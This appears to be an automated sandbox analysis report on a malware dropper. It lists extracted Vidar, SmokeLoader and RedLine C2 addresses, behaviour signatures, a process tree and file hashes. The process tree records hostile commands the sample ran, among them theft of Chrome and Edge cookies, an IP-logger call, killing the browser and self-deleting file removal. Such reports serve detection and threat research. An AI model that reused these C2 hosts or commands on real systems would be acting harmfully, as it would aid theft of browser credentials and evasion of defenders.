Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    135s
  • max time network
    318s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    20-07-2021 18:05

General

  • Target

    8 (2).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

AniNEW

C2

akedauiver.xyz:80

Extracted

Family

vidar

Version

39.7

Botnet

865

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    865

Signatures

  • Fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • redlinestealer 4 IoCs

    RedlineStealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 14 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 46 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 29 IoCs
  • Modifies registry class 16 IoCs
  • Modifies system certificate store 2 TTPs 16 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:460
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:868
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:1048
    • C:\Users\Admin\AppData\Local\Temp\8 (2).exe
      "C:\Users\Admin\AppData\Local\Temp\8 (2).exe"
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:748
      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2020
        • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\setup_install.exe
          "C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\setup_install.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1908
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c sonia_1.exe
            4⤵
              PID:1704
              • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_1.exe
                sonia_1.exe
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:572
                • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_1.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_1.exe" -a
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:1112
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c sonia_2.exe
              4⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1184
              • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_2.exe
                sonia_2.exe
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1176
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c sonia_4.exe
              4⤵
              • Loads dropped DLL
              PID:1540
              • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_4.exe
                sonia_4.exe
                5⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:1608
                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:1752
                  • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                    "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:2480
                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      8⤵
                      • Executes dropped EXE
                      PID:2080
                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      8⤵
                      • Executes dropped EXE
                      PID:2000
                  • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                    "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:2660
                    • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                      C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                      8⤵
                      • Executes dropped EXE
                      PID:2352
                  • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                    "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:2924
                  • C:\Users\Admin\AppData\Local\Temp\setup.exe
                    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:2620
                  • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                    "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:3012
                    • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                      "C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a
                      8⤵
                      • Executes dropped EXE
                      PID:1740
                  • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                    "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:2556
                    • C:\Windows\system32\WerFault.exe
                      C:\Windows\system32\WerFault.exe -u -p 2556 -s 680
                      8⤵
                      • Program crash
                      PID:1500
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c sonia_7.exe
              4⤵
                PID:468
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c sonia_6.exe
                4⤵
                • Loads dropped DLL
                PID:524
                • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_6.exe
                  sonia_6.exe
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Adds Run key to start application
                  • Modifies system certificate store
                  PID:1120
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    6⤵
                      PID:2040
                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2108
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c sonia_5.exe
                  4⤵
                  • Loads dropped DLL
                  PID:1300
                  • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_5.exe
                    sonia_5.exe
                    5⤵
                    • Executes dropped EXE
                    • Checks computer location settings
                    • Loads dropped DLL
                    • Modifies system certificate store
                    PID:596
                    • C:\Users\Admin\Documents\83sWdWF6qgIIb1vTYU6UjuIo.exe
                      "C:\Users\Admin\Documents\83sWdWF6qgIIb1vTYU6UjuIo.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:2180
                      • C:\Users\Admin\Documents\83sWdWF6qgIIb1vTYU6UjuIo.exe
                        C:\Users\Admin\Documents\83sWdWF6qgIIb1vTYU6UjuIo.exe
                        7⤵
                        • Executes dropped EXE
                        PID:2540
                    • C:\Users\Admin\Documents\JAzTUY2lAmrESSkPlmqXwTcF.exe
                      "C:\Users\Admin\Documents\JAzTUY2lAmrESSkPlmqXwTcF.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:2204
                      • C:\Users\Admin\Documents\JAzTUY2lAmrESSkPlmqXwTcF.exe
                        "C:\Users\Admin\Documents\JAzTUY2lAmrESSkPlmqXwTcF.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:2408
                    • C:\Users\Admin\Documents\RJiTpIu5c4qzzJNPBsrOlAik.exe
                      "C:\Users\Admin\Documents\RJiTpIu5c4qzzJNPBsrOlAik.exe"
                      6⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      PID:2196
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c ""C:\Program Files (x86)\EverestSoftrade\TonerRecover\log.bat" "
                        7⤵
                          PID:2568
                          • C:\Windows\SysWOW64\explorer.exe
                            explorer https://iplogger.org/2LBCU6
                            8⤵
                              PID:2176
                            • C:\Windows\SysWOW64\regedit.exe
                              regedit /s adj.reg
                              8⤵
                              • Runs .reg file with regedit
                              PID:3152
                            • C:\Windows\SysWOW64\regedit.exe
                              regedit /s adj2.reg
                              8⤵
                              • Runs .reg file with regedit
                              PID:3336
                          • C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe
                            "C:\Program Files (x86)\EverestSoftrade\TonerRecover\Updater.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:2600
                        • C:\Users\Admin\Documents\zzSEGP8mDLvqflgSLFZNsA6x.exe
                          "C:\Users\Admin\Documents\zzSEGP8mDLvqflgSLFZNsA6x.exe"
                          6⤵
                          • Executes dropped EXE
                          • Checks BIOS information in registry
                          • Checks whether UAC is enabled
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Modifies system certificate store
                          PID:2272
                          • C:\Users\Admin\AppData\Roaming\1234.exe
                            C:\Users\Admin\AppData\Roaming\1234.exe 1234
                            7⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:2040
                            • C:\Users\Admin\AppData\Roaming\1234.exe
                              "{path}"
                              8⤵
                                PID:3948
                          • C:\Users\Admin\Documents\8EM1LlZ3OtVDw7RSkZFjLGxc.exe
                            "C:\Users\Admin\Documents\8EM1LlZ3OtVDw7RSkZFjLGxc.exe"
                            6⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:2248
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                              7⤵
                                PID:2804
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd
                                  8⤵
                                    PID:1848
                                    • C:\Windows\SysWOW64\findstr.exe
                                      findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                      9⤵
                                        PID:2280
                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                        Acre.exe.com k
                                        9⤵
                                        • Executes dropped EXE
                                        PID:1944
                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                          10⤵
                                          • Executes dropped EXE
                                          PID:1384
                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                            11⤵
                                              PID:3352
                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com
                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Acre.exe.com k
                                                12⤵
                                                  PID:2292
                                          • C:\Windows\SysWOW64\PING.EXE
                                            ping 127.0.0.1 -n 30
                                            9⤵
                                            • Runs ping.exe
                                            PID:2084
                                    • C:\Users\Admin\Documents\ttsOKN3fneOZykWV7LzPcSos.exe
                                      "C:\Users\Admin\Documents\ttsOKN3fneOZykWV7LzPcSos.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:2240
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c cmd < Bagnava.xltm
                                        7⤵
                                          PID:2816
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd
                                            8⤵
                                              PID:2364
                                              • C:\Windows\SysWOW64\findstr.exe
                                                findstr /V /R "^IPAFDLOJiKVQTxFiLgMiLlaMrCAuVnAKdUxdXbtsjyJWSQEpztbDlGmbvNCwlINIlkmYZfphlcUGAvUjYsMQqXmJxXUpUru$" Sia.xltm
                                                9⤵
                                                  PID:1572
                                          • C:\Users\Admin\Documents\LqiISZq4tj5IDsCd_ok7ApH8.exe
                                            "C:\Users\Admin\Documents\LqiISZq4tj5IDsCd_ok7ApH8.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Modifies system certificate store
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2232
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 1444
                                              7⤵
                                              • Program crash
                                              PID:2216
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c taskkill /f /im chrome.exe
                                              7⤵
                                                PID:1776
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /f /im chrome.exe
                                                  8⤵
                                                  • Kills process with taskkill
                                                  PID:3088
                                            • C:\Users\Admin\Documents\my6l37ZBsVINF50PzMrgekOR.exe
                                              "C:\Users\Admin\Documents\my6l37ZBsVINF50PzMrgekOR.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:2224
                                            • C:\Users\Admin\Documents\LbHkK06F__wg5DWGDajJeKBn.exe
                                              "C:\Users\Admin\Documents\LbHkK06F__wg5DWGDajJeKBn.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:2288
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                7⤵
                                                • Executes dropped EXE
                                                PID:3056
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                7⤵
                                                • Executes dropped EXE
                                                PID:2388
                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                7⤵
                                                  PID:3120
                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  7⤵
                                                    PID:3200
                                                • C:\Users\Admin\Documents\GPSTc1724pwWof_FSXw_VcnV.exe
                                                  "C:\Users\Admin\Documents\GPSTc1724pwWof_FSXw_VcnV.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:3028
                                                  • C:\Users\Admin\Documents\GPSTc1724pwWof_FSXw_VcnV.exe
                                                    C:\Users\Admin\Documents\GPSTc1724pwWof_FSXw_VcnV.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:1860
                                                • C:\Users\Admin\Documents\R9ujM0k226iQStXjOgIx3rkf.exe
                                                  "C:\Users\Admin\Documents\R9ujM0k226iQStXjOgIx3rkf.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Checks BIOS information in registry
                                                  • Checks whether UAC is enabled
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  PID:3040
                                                • C:\Users\Admin\Documents\vklE9FgfnkVMisZtDrHiyPV8.exe
                                                  "C:\Users\Admin\Documents\vklE9FgfnkVMisZtDrHiyPV8.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:3064
                                                  • C:\Users\Admin\Documents\vklE9FgfnkVMisZtDrHiyPV8.exe
                                                    "C:\Users\Admin\Documents\vklE9FgfnkVMisZtDrHiyPV8.exe"
                                                    7⤵
                                                      PID:2300
                                                  • C:\Users\Admin\Documents\u78eCunUr13krGtq9afHpo2c.exe
                                                    "C:\Users\Admin\Documents\u78eCunUr13krGtq9afHpo2c.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:1528
                                                  • C:\Users\Admin\Documents\itU9xGFDqMjCmWR76XqHTrWe.exe
                                                    "C:\Users\Admin\Documents\itU9xGFDqMjCmWR76XqHTrWe.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:892
                                                  • C:\Users\Admin\Documents\QBYRhX2olmphIeAdf_T8crZO.exe
                                                    "C:\Users\Admin\Documents\QBYRhX2olmphIeAdf_T8crZO.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:896
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im QBYRhX2olmphIeAdf_T8crZO.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\QBYRhX2olmphIeAdf_T8crZO.exe" & del C:\ProgramData\*.dll & exit
                                                      7⤵
                                                        PID:3224
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                  4⤵
                                                  • Loads dropped DLL
                                                  PID:676
                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_3.exe
                                                    sonia_3.exe
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:1700
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 948
                                                      6⤵
                                                      • Program crash
                                                      PID:2952
                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                            C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                            1⤵
                                            • Loads dropped DLL
                                            PID:1704
                                            • C:\Windows\system32\rUNdlL32.eXe
                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                              2⤵
                                              • Process spawned unexpected child process
                                              PID:1584
                                              • C:\Windows\SysWOW64\rundll32.exe
                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                3⤵
                                                • Loads dropped DLL
                                                • Modifies registry class
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1980
                                          • C:\Windows\explorer.exe
                                            C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                            1⤵
                                              PID:1864
                                              • C:\Program Files\Internet Explorer\iexplore.exe
                                                "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/2LBCU6
                                                2⤵
                                                  PID:2828
                                                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2828 CREDAT:275457 /prefetch:2
                                                    3⤵
                                                      PID:3344
                                                • C:\Windows\system32\rUNdlL32.eXe
                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                  1⤵
                                                  • Process spawned unexpected child process
                                                  PID:3280
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                    2⤵
                                                      PID:3300
                                                  • C:\Windows\system32\DllHost.exe
                                                    C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                    1⤵
                                                      PID:2176

                                                    Network

                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                    Persistence

                                                    Modify Existing Service

                                                    1
                                                    T1031

                                                    Registry Run Keys / Startup Folder

                                                    1
                                                    T1060

                                                    Defense Evasion

                                                    Modify Registry

                                                    3
                                                    T1112

                                                    Disabling Security Tools

                                                    1
                                                    T1089

                                                    Virtualization/Sandbox Evasion

                                                    1
                                                    T1497

                                                    Install Root Certificate

                                                    1
                                                    T1130

                                                    Discovery

                                                    Query Registry

                                                    6
                                                    T1012

                                                    Virtualization/Sandbox Evasion

                                                    1
                                                    T1497

                                                    System Information Discovery

                                                    6
                                                    T1082

                                                    Peripheral Device Discovery

                                                    1
                                                    T1120

                                                    Remote System Discovery

                                                    1
                                                    T1018

                                                    Command and Control

                                                    Web Service

                                                    1
                                                    T1102

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\libcurl.dll
                                                      MD5

                                                      d09be1f47fd6b827c81a4812b4f7296f

                                                      SHA1

                                                      028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                      SHA256

                                                      0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                      SHA512

                                                      857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\libcurlpp.dll
                                                      MD5

                                                      e6e578373c2e416289a8da55f1dc5e8e

                                                      SHA1

                                                      b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                      SHA256

                                                      43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                      SHA512

                                                      9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\libgcc_s_dw2-1.dll
                                                      MD5

                                                      9aec524b616618b0d3d00b27b6f51da1

                                                      SHA1

                                                      64264300801a353db324d11738ffed876550e1d3

                                                      SHA256

                                                      59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                      SHA512

                                                      0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\libstdc++-6.dll
                                                      MD5

                                                      5e279950775baae5fea04d2cc4526bcc

                                                      SHA1

                                                      8aef1e10031c3629512c43dd8b0b5d9060878453

                                                      SHA256

                                                      97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                      SHA512

                                                      666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\libwinpthread-1.dll
                                                      MD5

                                                      1e0d62c34ff2e649ebc5c372065732ee

                                                      SHA1

                                                      fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                      SHA256

                                                      509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                      SHA512

                                                      3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\setup_install.exe
                                                      MD5

                                                      a3ca32ebdba2c07c2d386bb31cbd6d51

                                                      SHA1

                                                      e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                      SHA256

                                                      0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                      SHA512

                                                      c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\setup_install.exe
                                                      MD5

                                                      a3ca32ebdba2c07c2d386bb31cbd6d51

                                                      SHA1

                                                      e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                      SHA256

                                                      0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                      SHA512

                                                      c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_1.exe
                                                      MD5

                                                      6e43430011784cff369ea5a5ae4b000f

                                                      SHA1

                                                      5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                      SHA256

                                                      a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                      SHA512

                                                      33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4E7B3E24\sonia_1.exe
                                                      MD5

                                                      6e43430011784cff369ea5a5ae4b000f

                                                      SHA1

                                                      5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                      SHA256

                                                      a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                      SHA512

                                                      33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

